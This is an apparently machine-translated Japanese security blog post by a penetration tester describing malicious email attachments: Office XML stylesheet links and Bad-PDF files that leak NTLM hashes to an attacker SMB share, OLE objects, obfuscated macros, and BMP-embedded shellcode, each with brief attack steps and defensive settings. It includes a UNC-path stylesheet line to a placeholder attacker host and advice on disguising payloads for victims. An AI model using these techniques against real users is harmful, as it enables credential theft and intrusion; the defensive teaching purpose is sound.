私の仕事は、私が人々に嘘をつき、彼らのだまされやすさ、好奇心、貪欲などを悪用するという事実に関連しています。 私は自分の仕事が大好きで、創造的にアプローチしようとしています。 私の活動の詳細は、ソーシャルエンジニアリングの手法による攻撃の実行に関連しています。 この投稿では、悪意のある添付ファイルについてお話したいと思います。
PDFがメールに含まれる場合、それを開きますか? そして、Wordファイル? 不明なソースから画像を開きますか? アーカイブをダウンロードすると問題が発生する可能性はありますか? どの投資が危険であり、どれがそうでないかをどれだけよく知っていますか? 同僚はどうですか?
数十のプロジェクトで、ユーザーにペイロードを配信するためのまったく異なる方法を試しました。 いくつかは非常に効果的で、いくつかは簡単に検出されました-それぞれ独自のマイナスとプラスがあります。 アーカイブに拡張子.exeの実行可能ファイルをパックする方法については説明しません。 このような旧式のアプローチでは、セキュリティシステムを突破し、ユーザーに添付ファイルを開始させることはより高価です。 今日、メール(または送信)で実際に受信できる可能性のある危険なファイルを説明します。
免責事項:以下はすべて情報提供のみを目的としています。 著者は、ペンテスト中に得られた経験を説明し、これらの攻撃の繰り返しに責任を負わず、違法な目的のために資料を使用しないことを推奨します。
XML
メソッドの本質
ほとんどのOfficeファイルは、Microsoft Office Open XML(OOXML)に基づいています。これは、基本的に表、グラフ、プレゼンテーションなどを表示するためにMicrosoftが開発した圧縮XML形式です。 XMLの関与は、ドキュメントの拡張子(docx、xlsx、pptx)に表示されます。 このようなOfficeドキュメントを、すべてのタグと属性を含む通常のテキストファイルとして開くことができるのは非常に興味深いです。 Office Open XMLファイルはすべてXMLとして保存し、タグを変更できます。 たとえば、攻撃者によって制御されているパブリックフォルダーへのリンクを追加します。 XMLファイルを実行すると、開いているパブリックフォルダーに接続しようとします。 smbプロトコル経由で接続しようとすると、WindowsはNTLMハッシュ(NTLMv2)と攻撃者へのユーザーログインを親切に提供します。
簡単な実装
ベクターを実装するには、Office Open XMLドキュメント(docx、pptx、xlsxなど)を作成し、XMLとして保存する必要があります。 XMLを開き、次の変更を行います。
<?xml-stylesheet type="text/xsl" href="\\xxx.xxx.xxx.xxx \test\swordfish.xsl ">
指定されたタグでは、被害者が接続するパブリックネットワークフォルダのアドレスを指定する必要があります。
注 :
="\\xxx.xxx.xxx.xxx\test\swordfish.xsl
代わりに、
file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl
を作成
file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl
。次に、ファイルを保存して被害者に送信する必要があります。
攻撃に関する情報はここで見つけることができます 。
注 :オペレーティングシステムと設定によっては、ユーザーは追加の条件やコメントに同意する必要がある場合があります。例:
記事は保護アドバイスなしでは不完全です:
- 複雑なパスワードポリシーを使用します。
- NTLMv2を使用します。
- smb(tcp 139/445)経由の外部トラフィックを拒否します。
Bad-pdf
メソッドの本質
タグがPDFファイルに追加され、攻撃者によって制御されているパブリックsmbサーバーへのリンクが追加されます。 上記の例のように、ファイルを開くと、オペレーティングシステムはNTLMハッシュ(NTLMv2)を送信してパブリックフォルダーに接続します。
簡単な実装
この攻撃の実装は、前の攻撃よりもはるかに簡単です。 ハッシュを正常に盗むには、ユーティリティ(git clone hereまたはhere )をダウンロードし、Pythonファイルを実行する権限(chmod + x)を与えるだけです。 次に、次の図のように、pythonスクリプトを実行して、IPアドレス、ファイル名、インターフェイスを入力します。
ペイロードファイルの生成。
受信したファイルは、おめでとう、署名用文書、アプリケーションのスキャンなどを装ってメールに送信できます。 ファイルが開始されると、すべてのハッシュが攻撃者に送信されます。
保護
- 複雑なパスワードポリシーを使用します。
- NTLMv2を使用します。
- smb(tcp 139/445)経由の外部トラフィックを拒否します。
OLEオブジェクト
メソッドの本質
スクリプトは、クリックすることで起動される正規のOfficeドキュメントで起動されます。 スクリプトは絶対に任意で、通常は単なるペイロードです。 攻撃者の希望に応じて、エラーメッセージをシミュレートするOfficeドキュメントのスタイルの完全なコピーまで、アイコンを変更できます。 マクロとは異なり、OLE添付ファイルは一般ユーザーにとって疑わしいものではありません。
簡単な実装
この攻撃に備えるためには、上記の場合と比べてもう少し努力する必要があります。 最初に行うことは、ペイロードを生成することです。 次に、ペイロードから接続を受信するサーバーを起動し、Wordドキュメントを作成してRTFに変換し、ペイロードにリンクを追加する必要があります。 これは略称です。
攻撃に関する情報はここで見つけることができます 。
保護
このような攻撃から保護するために、次のレジストリを変更することをお勧めします 。
HKCUSoftwareMicrosoftOffice -> Office Version -> Office application -> SecurityPackagerPrompt
Office Version
値は16.0(Office 2016)です。 15.0(Office 2013); 14.0(Office 2010); または12.0(Office 2007)。
Office application
の値は、特定のOfficeアプリケーション、つまりWord、Excelなどの名前です。
このレジストリキーの値は「2」である必要があります。これは、「プロンプトなし、オブジェクトは実行されません」、またはオブジェクトの実行の実際の禁止を意味します。 値が「1」の場合、ユーザーは「ユーザーがクリックしてオブジェクトを実行するときにOfficeからプロンプトを出す」ことができます。つまり、オブジェクトをクリックしてクリックすると、Officeは対応するメッセージを表示します。 値「0」は、「ユーザーがクリックしてオブジェクトを実行してもOfficeからプロンプトが表示されない」、つまりオブジェクトは実行されますが、ユーザーがOfficeからメッセージを受信しないことを意味します。
これらの機能が会社のビジネスプロセスで使用されていない場合、変更を加えることができます。
マクロ
OLEが言及されたので、どうしてマクロに言及できないのでしょうか?
メソッドの本質
マクロ-ユーザーの作業を簡素化するために設計された一連のコマンド。 潜在的に、マクロ内のコマンドセットを完全に記述して、ペイロードを取得できます。 マクロを使用してドキュメントを作成するには、攻撃者はペイロードコードを難読化し、ドキュメントマクロにコードを追加するだけです。
簡単な実装
現在、マクロを生成する方法は非常に多くあります。 Luckystrikeツールを使用するか、より使い慣れたMetasploitで停止できます。 msfvenomを使用して、生成後にマクロを難読化できます。 マクロを作成したら、Officeドキュメントに追加するだけです。 ただし、OLE添付ファイルとは異なり、マクロを実行するには多大な労力が必要です。 現時点では、マクロを実行するユーザーはほとんどいません。 Windowsは、疑わしいマクロについて警告することを既に学習しており、それらの危険性について多くの話がありました。
保護
信頼性のために、通知なしでマクロの実行を無効にすることをお勧めします。
BMP
シェルコード付きのBMP添付ファイルに遭遇する可能性は非常に低いため、注意してください。
メソッドの本質
シェルコードはBMP形式で画像に埋め込まれています。 画像自体は、発見時には危険ではありません。 ポイントは、攻撃者にセッションを発生させないことです。 写真は、攻撃者がPowershellコマンドを使用してアクティブにする時間を横になって待つのに必要です。 この方法は、ウイルス対策や侵入検知ツールのバイパスほど攻撃ではありません。
簡単な実装
画像を作成するには、このリポジトリを使用します 。 DKMCは、イメージ生成から難読化されたコードまですべてを提供します。 また、「感染した」画像には奇妙なマルチカラーのピクセルが含まれることに注意してください。 これは、画像の可視領域を5〜10ピクセルトリミングすると簡単に修正できます。
イメージを作成した後、ファイルを被害者に配信し、適切な機会を待つか、powershellスクリプトを実行する機会を探す必要があります。
保護
すべてのbmpファイルを潜在的に危険なものとしてフィルタリングするのは非効率的です。 コンバーターを使用して画像を他の形式で保存したり、コンピューター上のファイルを検査したり、攻撃者が従業員のコンピューターでpowershellスクリプトを使用した場合、シェルコード付きの画像の存在は主要なセキュリティ問題ではないという事実を受け入れることができます。
実際、それがすべてです。 この記事が、投資とそれらがもたらす危険についての理解を深めることを願っています。 疑わしいリンクについては後ほど説明します。
エカテリーナ・ルダヤ( カテリン )、Jet Infosystems実用セキュリティ分析研究所の専門家